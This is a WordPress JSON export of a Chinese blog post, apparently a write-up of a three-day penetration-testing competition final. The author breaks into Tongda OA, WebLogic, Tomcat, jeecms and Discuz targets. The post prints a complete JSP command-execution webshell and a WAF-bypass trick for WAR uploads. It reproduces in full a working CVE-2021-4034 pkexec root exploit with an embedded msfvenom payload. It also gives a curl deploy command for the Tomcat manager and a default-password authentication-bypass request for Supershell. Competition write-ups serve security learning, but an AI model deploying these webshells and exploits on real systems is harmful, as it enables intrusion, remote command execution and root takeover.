{"id":2973,"date":"2024-02-06T19:27:48","date_gmt":"2024-02-06T11:27:48","guid":{"rendered":"https:\/\/fushuling.com\/?p=2973"},"modified":"2024-02-07T22:21:47","modified_gmt":"2024-02-07T14:21:47","slug":"%e6%9f%90%e6%9d%af%e9%9d%b6%e5%9c%ba%e6%b8%97%e9%80%8f%e5%86%b3%e8%b5%9b","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2024\/02\/06\/%e6%9f%90%e6%9d%af%e9%9d%b6%e5%9c%ba%e6%b8%97%e9%80%8f%e5%86%b3%e8%b5%9b\/","title":{"rendered":"\u67d0\u6e17\u900f\u51b3\u8d5b"},"content":{"rendered":"\n<p>\u4e00\u5171\u6253\u4e09\u5929\uff0c\u73af\u5883\u770b\u8d77\u6765\u8fd8\u662f\u6bd4\u8f83\u771f\uff0c\u6000\u7591\u662f\u771f\u7684\u62ff\u4e4b\u524dhvv\u7684\u771f\u5b9e\u573a\u666f\u642d\u7684\uff0c\u5c31\u662f\u73af\u5883\u7ecf\u5e38\u8fde\u4e0d\u4e0a\u53bb\uff0c\u975e\u5e38\u7684\u96be\u7ef7\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Day1<\/h2>\n\n\n\n<p>\u6709\u4e2a\u9898\u662f\u4e00\u4e2a\u901a\u8fbeOA\uff0c\u7248\u672c\u6bd4\u8f83\u8001\uff0c\u597d\u50cf\u662f11.4\uff0c\u8bd5\u4e86\u4e00\u4e0b\u662f\u5f31\u5bc6\u7801\uff0c\u8d26\u53f7admin\u5bc6\u7801\u4e3a\u7a7a\u5c31\u767b\u5f55\u8fdb\u53bb\u4e86\uff0c\u540e\u53f0\u6d1e\u6253\u7684<a href=\"https:\/\/github.com\/Threekiii\/Awesome-POC\/blob\/master\/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E\/%E9%80%9A%E8%BE%BEOA%20v11.8%20update.php%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md\">\u901a\u8fbeOA v11.8 update.php \u540e\u53f0\u6587\u4ef6\u5305\u542b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<\/a>\u3002\u5185\u7f51\u91cc\u53ea\u6709\u4e00\u53f0weblogic\uff0c\u7528\u901a\u8fbeoa\u90a3\u53f0\u673a\u5b50\u642d\u4e86\u4e2a\u4ee3\u7406\uff0c\u7528goby\u626b\u4e86\u4e00\u4e0b\u770b\u5230\u597d\u50cf\u6709weblogic ldap RCE\uff0c\u56e0\u4e3a\u4e4b\u524d\u6253\u6625\u79cb\u4e91\u5883\u6253\u8fc7ldap\u76f8\u5173\u7684\u6d1e\uff0c\u672c\u5730\u521a\u597d\u6709\u9644\u4ef6\uff0c\u4f20\u5230\u901a\u8fbeoa\u90a3\u53f0\u673a\u5b50\u4e0a\u5efa\u4e86\u4e2aldap\uff0c\u60f3\u6253\u4f46\u662f\u53d1\u73b0\u4f20\u5176\u4ed6\u7684\u503c\u8fd8\u597d\uff0c\u4f20payload\u7684\u503c\u5c31\u4f1a\u5361\u4f4f\uff0c\u6000\u7591\u662f\u547d\u4ee4\u6ca1\u56de\u663e\u4e14\u4e0d\u51fa\u7f51\uff0c\u7136\u540e\u4e0d\u77e5\u9053\u548b\u6253\u4e86\uff0c\u7ed3\u679c\u53bb\u770b\u4e86\u4e00\u4e0b\u90a3\u4e2aweblogic\u767b\u5f55\u53e3\uff0c\u76f4\u63a5weblogic:weblogic\u5c31\u767b\u5f55\u4e0a\u53bb\u4e86\uff0c\u7136\u540e\u5c31\u662f\u7ecf\u5178\u7684\u4f20war\u5305getshell:<\/p>\n\n\n\n<p>1.jsp<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;%@ page import=\"java.util.*,java.io.*\"%&gt;\n&lt;HTML&gt;&lt;BODY&gt;\n&lt;FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"&gt;\n&lt;INPUT TYPE=\"text\" NAME=\"cmd\"&gt;\n&lt;INPUT TYPE=\"submit\" VALUE=\"Send\"&gt;\n&lt;\/FORM&gt;\n&lt;pre&gt;\n&lt;%\nif (request.getParameter(\"cmd\") != null) {\nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"&lt;BR&gt;\");\nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\nOutputStream os = p.getOutputStream();\nInputStream in = p.getInputStream();\nDataInputStream dis = new DataInputStream(in);\nString disr = dis.readLine();\nwhile ( disr != null ) {\nout.println(disr);\ndisr = dis.readLine();\n}\n}\n%&gt;\n&lt;\/pre&gt;\n&lt;\/BODY&gt;&lt;\/HTML&gt;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>jar -cvf shell.war 1.jsp<\/code><\/pre>\n\n\n\n<p>\u90e8\u7f72\u6210\u529f\u540e\u8bbf\u95eeurl\/shell\/1.jsp\u5373\u53ef\u770b\u5230\u6211\u4eec\u7684\u9a6c\uff0c\u8fd9\u4e2a\u9a6c\u662f\u8f93\u5165\u6846\u6267\u884c\u547d\u4ee4\u76f4\u63a5\u56de\u663e\uff0c\u76f4\u63a5\u62ffflag\u5373\u53ef\u3002<\/p>\n\n\n\n<p>\u8fd9\u91cc\u6709\u4e00\u4e2a\u5c0ftrick\uff0c\u6709\u65f6\u5019\u4f60\u4f20war\u5305\u4f1a\u88abwaf\u62e6\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u7528\\\\\\\u62c6\u5206\u540e\u7f00\u7ed5\u8fc7waf\uff0c\u4e5f\u5c31\u662f\u8bf4\u6bd4\u5982\u4f60\u4f20\u4e00\u4e2ashell.war\u88ab\u62e6\u4e86\uff0c\u4f60\u53ef\u4ee5\u4f20\u4e00\u4e2ashell.w\\\\\\ar\u4e0a\u53bb\uff0cwaf\u4e0d\u4f1a\u544a\u8b66\u4e5f\u4e0d\u4f1a\u62e6\u622a\u3002<\/p>\n\n\n\n<p>\u540e\u9762\u662f\u4f20\u4e86\u4e00\u4e2a\u54e5\u65af\u62c9\u9a6c\u4e0a\u53bb\uff0c\u56e0\u4e3a\u6709\u4e2aflag\u5728\u6839\u76ee\u5f55\uff0c\u662froot\u6743\u9650\u7684\uff0c\u9700\u8981\u63d0\u6743\u3002suid\u770b\u4e86\u4e00\u4e0b\u7528\u7684\u662fpsexec\u63d0\u6743\u3002\u56e0\u4e3a\u90a3\u4e2a\u73af\u5883\u91cc\u521a\u597d\u76f4\u63a5\u6709python\uff0c\u6240\u4ee5\u9009\u62e9\u5f39shell\u5230\u672c\u5730\uff0c\u4e0d\u7136\u6ca1\u6709tty\uff0c\u7136\u540e\u76f4\u63a5\u8fd0\u884cpython\u811a\u672c\u63d0\u6743(\u60f3\u8fd0\u884c\u53ef\u6267\u884c\u6587\u4ef6\u63d0\u6743\uff0c\u4f60\u5fc5\u987b\u7528\u76f8\u540c\u73af\u5883\u7f16\u8bd1\u4e00\u4e2a\uff0c\u5f88\u9ebb\u70e6)\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python3\n\n# CVE-2021-4034 in Python\n#\n# Joe Ammond (joe@ammond.org)\n#\n# This was just an experiment to see whether I could get this to work\n# in Python, and to play around with ctypes\n\n# This was completely cribbed from blasty's original C code:\n# https:\/\/haxx.in\/files\/blasty-vs-pkexec.c\n\nimport base64\nimport os\nimport sys\n\nfrom ctypes import *\nfrom ctypes.util import find_library\n\n# Payload, base64 encoded ELF shared object. Generate with:\n#\n# msfvenom -p linux\/x64\/exec -f elf-so PrependSetuid=true | base64\n#\n# The PrependSetuid=true is important, without it you'll just get\n# a shell as the user and not root.\n#\n# Should work with any msfvenom payload, tested with linux\/x64\/exec\n# and linux\/x64\/shell_reverse_tcp\n\npayload_b64 = b'''\nf0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC\nAEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ\nAAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA\nAAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA\nAAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA\nAACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAASDH\/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=\n'''\npayload = base64.b64decode(payload_b64)\n\n# Set the environment for the call to execve()\nenviron = &#91;\n        b'exploit',\n        b'PATH=GCONV_PATH=.',\n        b'LC_MESSAGES=en_US.UTF-8',\n        b'XAUTHORITY=..\/LOL',\n        None\n]\n\n# Find the C library to call execve() directly, as Python helpfully doesn't\n# allow us to call execve() with no arguments.\ntry:\n    libc = CDLL(find_library('c'))\nexcept:\n    print('&#91;!] Unable to find the C library, wtf?')\n    sys.exit()\n\n# Create the shared library from the payload\nprint('&#91;+] Creating shared library for exploit code.')\ntry:\n    with open('payload.so', 'wb') as f:\n        f.write(payload)\nexcept:\n    print('&#91;!] Failed creating payload.so.')\n    sys.exit()\nos.chmod('payload.so', 0o0755)\n\n# make the GCONV_PATH directory\ntry:\n    os.mkdir('GCONV_PATH=.')\nexcept FileExistsError:\n    print('&#91;-] GCONV_PATH=. directory already exists, continuing.')\nexcept:\n    print('&#91;!] Failed making GCONV_PATH=. directory.')\n    sys.exit()\n\n# Create a temp exploit file\ntry:\n    with open('GCONV_PATH=.\/exploit', 'wb') as f:\n        f.write(b'')\nexcept:\n    print('&#91;!] Failed creating exploit file')\n    sys.exit()\nos.chmod('GCONV_PATH=.\/exploit', 0o0755)\n\n# Create directory to hold gconf-modules configuration file\ntry:\n    os.mkdir('exploit')\nexcept FileExistsError:\n    print('&#91;-] exploit directory already exists, continuing.')\nexcept:\n    print('&#91;!] Failed making exploit directory.')\n    sys.exit()\n\n# Create gconf config file\ntry:\n    with open('exploit\/gconv-modules', 'wb') as f:\n        f.write(b'module  UTF-8\/\/    INTERNAL    ..\/payload    2\\n');\nexcept:\n    print('&#91;!] Failed to create gconf-modules config file.')\n    sys.exit()\n\n# Convert the environment to an array of char*\nenviron_p = (c_char_p * len(environ))()\nenviron_p&#91;:] = environ\n\nprint('&#91;+] Calling execve()')\n# Call execve() with NULL arguments\nlibc.execve(b'\/usr\/bin\/pkexec', c_char_p(None), environ_p)\n<\/code><\/pre>\n\n\n\n<p>\u611f\u89c9\u5df2\u7ecf\u628a\u73af\u5883\u91cc\u7684\u4e1c\u897f\u90fd\u6253\u5b8c\u4e86\uff0c\u8fd8\u6709300\u5206\u786e\u5b9e\u4e0d\u77e5\u9053\u85cf\u54ea\u91cc\u53bb\u4e86<\/p>\n\n\n\n<p>\u53e6\u4e00\u4e2a\u770b\u4e86\u7684\u9898\u662f\u4e00\u4e2adedecms\uff0c\u76f4\u63a5www.zip\u5c31\u80fd\u4e0b\u5230\u6e90\u7801\uff0c\u91cc\u9762\u6709\u4e00\u4e2aflag\u3002\u90a3\u4e2a\u7248\u672c\u521a\u597d\u6709\u540e\u53f0\u6d1e\uff0c\u4f46\u5bc6\u7801\u7206\u7834\u4e0d\u51fa\u6765\u5f88\u62bd\u8c61\u3002\u6709\u4e24\u6761\u8def\uff0c\u4e00\u662f\u9898\u76ee\u91cc\u90a3\u4e2a\u73af\u5883\u53ef\u4ee5\u626b\u51fa\u6765\u4e00\u4e2adata\/session_\u76ee\u5f55\uff0ccookie\u4e2d\u7684phpsession\u521a\u597d\u5bf9\u5e94\u7740\u6587\u4ef6\u540d\uff0c\u601d\u8def\u5c31\u662f\u901a\u8fc7\u6cc4\u9732\u7684php\u7684session\u53d8\u6210admin\uff0c\u7136\u540e\u6253tpl\u90a3\u4e2a\u6d1e\u3002\u53e6\u4e00\u6761\u8def\u662f\uff0c\u7f51\u7ad9\u767b\u5f55\u6846\u4e0b\u9762\u53ef\u4ee5\u770b\u5230\u7ba1\u7406\u5458\u90ae\u7bb1\u662fadmin@xxx.com\uff0c\u90a3\u4e2axxx.com\u4e5f\u53ef\u4ee5\u7ffb\u6e90\u7801\u770b\u5230\uff0c\u5c31\u662f\u7f51\u7ad9\u76ee\u5f55\uff0c\u800c\u7ba1\u7406\u5458\u7684\u5bc6\u7801\u5c31\u662f\u8fd9\u4e2axxx.com(\u4ec0\u4e48\u50bb\u903c\u793e\u5de5\uff1f)\uff0c\u6253\u5b8c\u63d0\u6743flag\u5728\u56de\u6536\u7ad9\u91cc\u3002<\/p>\n\n\n\n<p>\u8fd8\u6709\u4e00\u4e2atomcat\u7684\u9898\uff0c\u53ef\u4ee5tomcat:tomcat\u767b\u4e0a\u53bb\uff0c\u4f46\u6211\u4eec\u662fhost-manager\u4e0d\u662fmanager\uff0c\u6709\u4ec0\u4e48\u5dee\u522b\u5462\uff0c\u90a3\u5c31\u662fhost-manager\u4e0d\u80fd\u4e0a\u4f20\u5e76\u90e8\u7f72war\u5305\uff0c\u800cmanager\u53ef\u4ee5\u3002\u5f53\u65f6\u662f\u65ad\u7f51\u7684\uff0c\u5565\u8d44\u6599\u90fd\u67e5\u4e0d\u5230\u5f88\u70e6\uff0c\u53ef\u80fd\u662f\u7f3a\u4e86\u8fd9\u7bc7\u6587\u7ae0<a href=\"https:\/\/www.cnblogs.com\/linuxsec\/articles\/10701475.html\">Tomcat\u53d8\u4f53\u5229\u7528\uff1ahost-manager<\/a>\uff0chost-manger\u90e8\u7f72\u5e94\u7528\u9700\u8981\u5c06\u8981\u90e8\u7f72\u7684\u5e94\u7528\u7684\u8def\u5f84\u548c\u4e00\u4e2a\u6709\u6548\u7684vhost\uff0cm4x\u54e5\u54e5\u662f\u76f4\u63a5\u628aflag\u90e8\u7f72\u5230\u7f51\u7ad9\u4e0a\u6253\u7684\u3002<\/p>\n\n\n\n<p>\u5f53\u7136\u8fd8\u6709\u4e00\u4e2a\u505a\u6cd5\uff0c\u56e0\u4e3amanger\u7ba1\u7406\u9875\u9762\u5176\u5b9e\u53ea\u662f\u88ab\u9690\u85cf\u4e86\uff0c\u63a5\u53e3\u8fd8\u5728\uff0c\u76f4\u63a5\u6345\u63a5\u53e3\u4e5f\u80fd\u76f4\u63a5\u4e0a\u4f20war\u5305\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl --upload-file cmd.war -u 'tomcat:tomcat' \"http:\/\/201.1.2.7:8080\/manager\/text\/deploy?path=\/monshell\"<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Day2<\/h2>\n\n\n\n<p>\u7b2c\u4e8c\u5929\u90a3\u4e2apwn\u9898\u5f88\u50bb\u903c\uff0c\u662fssh\u5f31\u5bc6\u7801\uff0croot 123456\u5c31\u4e0a\u53bb\u4e86\uff0c\u72c2\u6070300\u5206\uff0c\u65e9\u4e0a\u4e00\u5806\u961f\u9760\u8fd9\u4e2a\u4e0a\u5206\u4e86\uff0c\u4e0b\u5348\u4e0d\u77e5\u9053\u4e3b\u529e\u65b9\u662f\u53d1\u73b0\u4e86\u8fd8\u662f\u5565\uff0c\u76f4\u63a5\u628a\u73af\u5883\u5173\u4e86\u76f4\u63a5\u4e0a\u4e0d\u53bb\u4e86\uff0c\u6211\u8fd9\u79cd\u65e9\u4e0a\u6ca1\u6253\u7684\u5c31\u53ea\u80fd\u5f53\u51a4\u5927\u5934\u4e86\u3002\u800c\u4e14\u6211\u7b2c\u4e8c\u5929\u73af\u5883\u90fd\u8fde\u4e0d\u4e0a\uff0c\u627e\u88c1\u5224\u641e\u4e86\u534a\u5929\u4e5f\u6ca1\u641e\u51fa\u6765\uff0c\u65e9\u4e0a\u4e5d\u70b9\u5f00\u59cb\u6253\uff0c\u76f4\u5230\u4e0b\u5348\u4e09\u70b9\u6211\u624d\u7ec8\u4e8e\u53d1\u73b0\u662f\u81ea\u5df1\u7684ip\u597d\u50cf\u88ab\u4e3b\u529e\u65b9ban\u4e86\uff0c\u6362\u4e86\u4e2aip\u5c31\u597d\u4e86\u3002<\/p>\n\n\n\n<p>\u63a5\u7740\u6709\u4e2a\u50bb\u903c\u9898\u53ebsupershell\uff0c\u8fd8\u662f\u7f3a\u4e86\u7bc7\u6587\u7ae0\uff1a<a href=\"https:\/\/mp.weixin.qq.com\/s\/17F9vpsRg_2Z3QOVkGdOuw?ref=www.ctfiot.com\">RealWorld|\u5e94\u6025\u5f15\u53d1\u7684\u89c4\u6a21\u6027\u7ea2\u961f\u53cd\u5236\u6848\u4f8b<\/a>\uff0c\u8fd9\u4e2a\u6d1e\u592a\u65b0\u4e86\uff0c\u6587\u7ae0\u4e0a\u4e2a\u6708\u53d1\u7684\uff0c\u6211\u672c\u5730\u6587\u5e93\u6ca1\u6709\uff0c\u5927\u6982\u5c31\u662f\u8bf4supershell\u6709\u4e2a\u9ed8\u8ba4token\uff0c\u53ef\u4ee5\u672a\u6388\u6743\u8fdb\u540e\u53f0\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/supershell\/share\/shell\/login\/auth HTTP\/1.1\nHost: x.x.x.x:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/117.0.5938.63 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nContent-type: application\/json\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 33\n\n{\n\"share_password\":\"tdragon6\"\n}<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3a\u6211\u65e9\u4e0a\u73af\u5883\u90fd\u8fde\u4e0d\u4e0a\u53bb\uff0c\u6240\u4ee5\u662f\u770b\u7684\u6709\u9644\u4ef6\u7684\u9898\u505a\uff0c\u6709\u4e2a\u6d41\u91cf\u9898\u7ed9\u4e86\u4e2achrome\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u5e94\u8be5\u662f\u60f3\u8ba9\u6211\u4eec\u89e3\u5bc6\u7801\uff0c\u53e6\u5f00\u4e86\u4e2a\u6587\u7ae0\u8be6\u7ec6\u5206\u6790\uff1a<a href=\"https:\/\/fushuling.com\/index.php\/2023\/11\/24\/%e5%a6%82%e4%bd%95%e4%bb%85%e9%80%9a%e8%bf%87chrome%e9%85%8d%e7%bd%ae%e6%96%87%e4%bb%b6%e7%a6%bb%e7%ba%bf%e8%bf%98%e5%8e%9f%e5%af%86%e7%a0%81\/\">\u5982\u4f55\u4ec5\u901a\u8fc7Chrome\u914d\u7f6e\u6587\u4ef6\u79bb\u7ebf\u8fd8\u539f\u5bc6\u7801<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Day3<\/h2>\n\n\n\n<p>\u6709\u4e00\u4e2ajeecms\uff0csystem:123456\u767b\u8fdb\u53bb\u4e86\uff0c\u540e\u53f0\u6709\u53ef\u4ee5\u6587\u4ef6\u4e0a\u4f20\u7684\u529f\u80fd\uff0c\u867d\u7136\u6709\u6821\u9a8c\uff0c\u4f46\u662f\u53ef\u4ee5\u6293\u5305\u6539\u540e\u7f00\uff0c\u6539\u6210jsp\u5373\u53ef\uff0c\u503c\u5f97\u6ce8\u610f\u7684\u662f\u4ed6\u8fd9\u4e2a\u4e0a\u4f20\u8fc7\u7a0b\u6709\u4e24\u4e2a\u5305\uff0c\u4e24\u4e2a\u5305\u90fd\u9700\u8981\u6293\u5305\u6539\u540e\u7f00\uff0c\u4e0d\u7136\u6ca1\u6cd5\u901a\u8fc7\u6821\u9a8c\uff0c\u53ef\u80fd\u662f\u67d0\u79cd\u5947\u602a\u7684waf\u3002\u8fde\u4e0a\u53bb\u4e4b\u540e\u53d1\u73b0\u662f\u4e00\u4e2adocker\u73af\u5883\uff0c\u8fd8\u9700\u8981docker\u9003\u9038\uff0c\u4e22<a href=\"https:\/\/github.com\/cdk-team\/CDK\">cdk<\/a>\u4e0a\u53bb\uff0c\u7528CVE-2022-0492\u9003\u9038\u3002<\/p>\n\n\n\n<p>\u516c\u5171\u73af\u5883\u662f\u4e00\u4e2adiscuz\uff0c\u53cd\u6b63\u5927\u90e8\u5206\u65f6\u5019\u88ab\u6253\u7684\u73af\u5883\u90fd\u8fde\u4e0d\u4e0a\u53bb\uff0c\u662f\u6253<a href=\"https:\/\/saucer-man.com\/information_security\/323.html\">Discuz!ML V3.X \u4ee3\u7801\u6ce8\u5165\u590d\u73b0<\/a>\uff0c\u7528cookie\u5b57\u6bb5\u4e2d\u7684language\u53c2\u6570\u8fdb\u884cRCE\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u5171\u6253\u4e09\u5929\uff0c\u73af\u5883\u770b\u8d77\u6765\u8fd8\u662f\u6bd4\u8f83\u771f\uff0c\u6000\u7591\u662f\u771f\u7684\u62ff\u4e4b\u524dhvv\u7684\u771f\u5b9e\u573a\u666f\u642d\u7684\uff0c\u5c31\u662f\u73af\u5883\u7ecf\u5e38\u8fde\u4e0d\u4e0a\u53bb\uff0c\u975e\u5e38\u7684\u96be\u7ef7\u3002 D [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-2973","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2973","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2973"}],"version-history":[{"count":6,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2973\/revisions"}],"predecessor-version":[{"id":3064,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2973\/revisions\/3064"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2973"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}